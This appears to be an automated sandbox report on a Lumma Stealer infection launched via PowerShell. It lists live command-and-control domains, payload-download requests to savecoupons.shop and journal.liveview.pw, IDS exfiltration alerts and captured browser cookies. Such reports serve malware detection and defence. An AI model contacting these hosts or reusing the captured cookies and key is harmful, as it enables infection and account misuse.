                    Source: 8.2.powershell.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["surmisehotte.click", "aspecteirs.lat", "energyaffai.lat", "crosshuaht.lat", "discokeyus.lat", "grannyejh.lat", "sustainskelet.lat", "rapeflowwj.lat", "necklacebudi.lat"], "Build id": "yJEcaG--singl6"}
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: rapeflowwj.lat
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: crosshuaht.lat
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: sustainskelet.lat
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: aspecteirs.lat
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: energyaffai.lat
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: necklacebudi.lat
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: discokeyus.lat
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: grannyejh.lat
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: surmisehotte.click
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: TeslaBrowser/5.5
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: - Screen Resoluton:
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: - Physical Installed Memory:
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: Workgroup: -
                    Source: 8.2.powershell.exe.400000.0.raw.unpackString decryptor: yJEcaG--singl6
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00415799 CryptUnprotectData,8_2_00415799
                    Source: unknownHTTPS traffic detected: 172.67.223.7:443 -> 192.168.11.20:49754 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.37.173:443 -> 192.168.11.20:49755 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49756 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49757 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49770 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49771 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49772 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49774 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49775 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49776 version: TLS 1.2
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 1002
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06C774CBh6_2_06C773B0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06C75276h6_2_06C7520E
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06C75276h6_2_06C75210
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06C774CBh6_2_06C773A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06C74C29h6_2_06C74851
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06C74C29h6_2_06C74860
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06C75276h6_2_06C75416
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 06C774CBh6_2_06C77574
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]8_2_00423860
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx8_2_00438810
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh8_2_00438810
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh8_2_00438810
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then test eax, eax8_2_00438810
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al8_2_0042DA53
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], ax8_2_0041B2E0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]8_2_00417DEE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_00409580
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebp+00h], ax8_2_00409580
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then xor edi, edi8_2_0041759F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_0043AEC0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]8_2_0043C767
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]8_2_0041E7C0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, eax8_2_00415799
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax8_2_00415799
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_0042984F
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0041682D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]8_2_0041682D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]8_2_0041682D
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], bp8_2_0041D83A
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push C0BFD6CCh8_2_00423086
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push C0BFD6CCh8_2_00423086
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]8_2_0042B170
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]8_2_004179C1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h8_2_0043B1D0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax8_2_0043B1D0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx8_2_004291DD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]8_2_004291DD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax8_2_00405990
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebp, eax8_2_00405990
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, esi8_2_00422190
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ebx], cx8_2_00422190
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h8_2_00422190
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0042CA49
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]8_2_00416263
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]8_2_00415220
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push esi8_2_00427AD3
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0042CAD0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push ebx8_2_0043CA93
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_0041CB40
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx8_2_0041CB40
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00428B61
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0042CB11
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], cl8_2_0042CB22
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]8_2_0043F330
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax8_2_0040DBD9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax8_2_0040DBD9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]8_2_00417380
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h8_2_0041D380
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp al, 2Eh8_2_00426B95
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_00435450
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]8_2_00417380
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push 00000000h8_2_00429C2B
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [ecx], dx8_2_004291DD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]8_2_004291DD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]8_2_004074F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]8_2_004074F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]8_2_0043ECA0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h8_2_004385E0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax8_2_004385E0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp dword ptr [0044450Ch]8_2_00418591
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]8_2_00428D93
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]8_2_0041C653
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ebp8_2_00425E70
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp dword ptr [004455F4h]8_2_00425E30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al8_2_00408F50
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], bl8_2_00408F50
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_0042A700
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]8_2_0040B70C
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al8_2_0041BF14
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]8_2_00419F30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, word ptr [edx]8_2_004197C2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [edi], dx8_2_004197C2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx8_2_004197C2
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, ebx8_2_0042DFE9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx8_2_0040BFFD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]8_2_0043EFB0
                    Source: chrome.exeMemory has grown: Private usage: 1MB later: 35MB

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49757 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49757 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49756 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49756 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49774 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49776 -> 104.21.96.1:443
                    Source: Malware configuration extractorURLs: surmisehotte.click
                    Source: Malware configuration extractorURLs: aspecteirs.lat
                    Source: Malware configuration extractorURLs: energyaffai.lat
                    Source: Malware configuration extractorURLs: crosshuaht.lat
                    Source: Malware configuration extractorURLs: discokeyus.lat
                    Source: Malware configuration extractorURLs: grannyejh.lat
                    Source: Malware configuration extractorURLs: sustainskelet.lat
                    Source: Malware configuration extractorURLs: rapeflowwj.lat
                    Source: Malware configuration extractorURLs: necklacebudi.lat
                    Source: global trafficHTTP traffic detected: GET /singl6.vsdx HTTP/1.1Host: journal.liveview.pwConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                    Source: Joe Sandbox ViewIP Address: 172.67.223.7 172.67.223.7
                    Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49756 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49757 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49773 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49775 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49771 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49770 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49772 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49776 -> 104.21.96.1:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49774 -> 104.21.96.1:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.50.112.50
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.192.36.227
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.192.36.227
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.192.36.227
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.192.36.227
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.192.36.227
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.192.36.227
                    Source: unknownTCP traffic detected without corresponding DNS query: 23.192.36.227
                    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.237
                    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.217.165.195
                    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                    Source: unknownTCP traffic detected without corresponding DNS query: 172.217.165.195
                    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                    Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
                    Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
                    Source: unknownUDP traffic detected without corresponding DNS query: 239.255.255.250
                    Source: global trafficHTTP traffic detected: GET /singl6.mp4 HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: savecoupons.shopConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /singl6.vsdx HTTP/1.1Host: journal.liveview.pwConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                    Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGMS_nLsGIjAeKkU8fuiGNfH1GNGe4bKzU792jorXUJawIOeaOJy1_dG9sWahqozDrID_PZwKGOwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                    Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGMS_nLsGIjA0ik1s4JVq9eOJpsVlOM2gI-DLgMPidfxSgxq5jVmu_BWE0kM6B2QcsTf8YS-EqZsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
                    Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                    Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                    Source: chrome.exe, 00000009.00000003.57225858403.0000781C03780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C02418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const 